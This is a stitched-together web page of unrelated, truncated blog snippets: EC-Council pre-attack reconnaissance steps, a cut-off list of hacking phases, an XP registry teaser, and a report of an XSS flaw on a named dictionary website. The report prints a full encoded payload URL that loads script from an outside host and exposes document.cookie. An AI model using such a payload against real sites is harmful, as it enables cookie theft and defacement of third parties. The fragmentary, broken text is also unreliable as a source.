In the pre-attack phase, there are seven steps, which have been defined by the EC-Council, as follows:

1. Information gathering
2. Determining network range
3. Identifying active machines
4. Finding open ports and applications
5. OS fingerprinting
6. Fingerprinting services
7. Mapping the network

Explore More

What are the phases of malicious hacking?

The following are the phases of malicious hacking: 1. Reconnaissance: In this phase, the attacker gathers information about the victim. 2. Scanning: In this phase, the attacker begins to probe

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :    Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted

XP Registry tricks II

Easy Text Size Change in Help & IE Tip:I mentioned a way that you can change the size of the text that is display in the Help file and in